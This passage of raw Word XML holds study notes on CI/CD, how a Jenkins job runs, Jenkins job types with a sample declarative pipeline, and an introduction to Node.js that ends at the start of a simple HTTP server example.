        <w:t>: Break down work into smaller pieces to make it easier to integrate and test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067B5E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production</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Continuous monitoring is necessary to quickly detect issues after deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E8E0D5"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with Docker and Kubernetes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12062FA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CI/CD works really well with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3854" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B742100" w14:textId="087C9B8E" w:rsidR="002B5B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00B849F5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="953" w:name="_Toc197868167"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will Jenkins' job work? Explain the process</w:t>
      </w:r>
      <w:r w:rsidR="002B5B56" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="953"/>
    </w:p>
    <w:p w14:paraId="3CB93758" w14:textId="1630F30D" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07E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how a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jenkins job</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> works — step-by-step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D0FC0"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B9FD0E">
          <v:rect id="_x0000_i3855" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A1F7F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at is Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB38A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xml:space="preserve"> is an open-source automation server used to build, test, and deploy applications. It supports </w:t>
      </w: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by automating parts of the software development lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D2C93F"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DC6F2">
          <v:rect id="_x0000_i3856" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="297F589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Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157594F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ource Code Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE1470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developer pushes code to a version control system like </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GitHub</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itLab</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Bitbucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E122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Triggering the Job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBB811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is configured to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a job when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1054332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commit is made (webhook or polling SCM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093B83A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scheduled time is reached (CRON-style scheduling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B35D29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nually triggered by a user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADCC48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iggered by another Jenkins job (downstream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326CF29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SCM Checkout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A392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checks out the code from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using configured Git credentials and branch).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564582A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Build Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B2D34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executes build scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E603FF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Java: mvn clean install or gradle build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D835D5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Node.js: npm install &amp;&amp; npm run build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039FE42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compiles source code, resolves dependencies, and packages the app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2800DCC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Test Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442276A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 integration tests, or functional tests are executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792E3BD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mvn test, pytest, npm test, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBA3470"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Static Code Analysis (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7AB9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ols like </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SonarQub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Checkstyle</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MD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be integrated to analyze code quality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E35E254"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Artifact Archiving (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5438A50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build is successful, Jenkins archives the artifacts like .jar, .war, .zip, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1FE8B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stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Artifactory</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Nexus</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or locally on Jenkins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2E9E6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Deploy (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F8F9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deploy to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB35F5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Test environments</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using scripts or tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ansibl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tc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5DE9F2"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duction</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if set up for Continuous Deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E4B21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Notifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5792147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send job results via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A291FA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mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B1445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ack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49983159"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icrosoft Teams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA9F87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legram, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD3ACF"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Job Completion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B5C16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ob status is marked as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C8B08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Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062A1D4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Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B17FD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Unstable (e.g., tests failed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C820F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s are available in the console output for debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D3AC4"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A3608FA">
          <v:rect id="_x0000_i3857" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4914502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Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B532DE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style Job</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Simple UI-based job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3113B81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peline Job</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Defined using </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Groovy script</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Jenkinsfile), allows complex workflows with stages and steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8998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ultibranch Pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Auto-discovers branches and runs a separate pipeline per branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B034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larative Pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Easier syntax for Jenkinsfile (preferred for modern CI/CD).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E547D3"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36193">
          <v:rect id="_x0000_i3858" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0156D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Declarative Jenkins Pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546CA92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peline {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A2287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gent any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F73B44" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A977F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s {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6C3DE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Checkout') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8EEA6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61C27EE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git 'https://github.com/example/project.git'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8C35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06E661D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F44EB18" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21FBDE1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Build') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5683370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2E2BCE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build'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F755D4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64876C1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49B6C5" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F5814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Test') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E49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4B0F4DD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test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A392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5FE047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2F056C" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38EFCF6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Deploy') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F5AE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64510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Deploying to dev server...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228FD9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Add deployment script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038B86D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1ABFAF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6CB2E2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7BB702E1" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F67B1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st {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DCAC8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uccess {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D346A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executed successfully!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28495F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1F23EA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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655B271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failed.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F6CE8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B5E0DF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249F5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0A554706"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2F687">
          <v:rect id="_x0000_i3859" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04926AC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Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0018081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ly store passwords, tokens, and SSH keys for Git, DockerHub, AWS, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FB87D1"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7886BD">
          <v:rect id="_x0000_i3860" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3096238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Integrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADD1DC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCB1B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE4316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narQube</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0648AF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lack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8C8AA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itHub/GitLab/Bitbucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B04AA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xus/Artifactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588678A5" w14:textId="65E11D6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3861" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61495A4A" w14:textId="287C125E" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="00702671">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="954" w:name="_Toc197868168"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Node JS</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="954"/>
    </w:p>
    <w:p w14:paraId="5259323D" w14:textId="041F7F10" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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runtime environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that allows you to run </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JavaScript code outside of a browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — most commonly used to build </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server-side applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E932F0"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B3DC68">
          <v:rect id="_x0000_i3862" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="075406CB"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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9558E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ilt on Chrome’s V8 JavaScript Engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executes JavaScript at high speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2580C13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amp; Event-driven</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non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ideal for scalable, real-time applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5780CA92"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ngle-threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: But handles concurrent connections efficiently using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E8255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s JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: So frontend developers can write backend logic too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EED86CC"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B33E9">
          <v:rect id="_x0000_i3863" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1959142F"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096811E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T APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7883F26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l-time chat applications (e.g., Socket.io)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F6722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reaming services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2186AA13"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and-line tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4637554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erless functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CF2503"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A338F9">
          <v:rect id="_x0000_i3864" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBC1F9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD5E2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A simple HTTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A71B8D7"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st http = require('http');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CCCC32" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
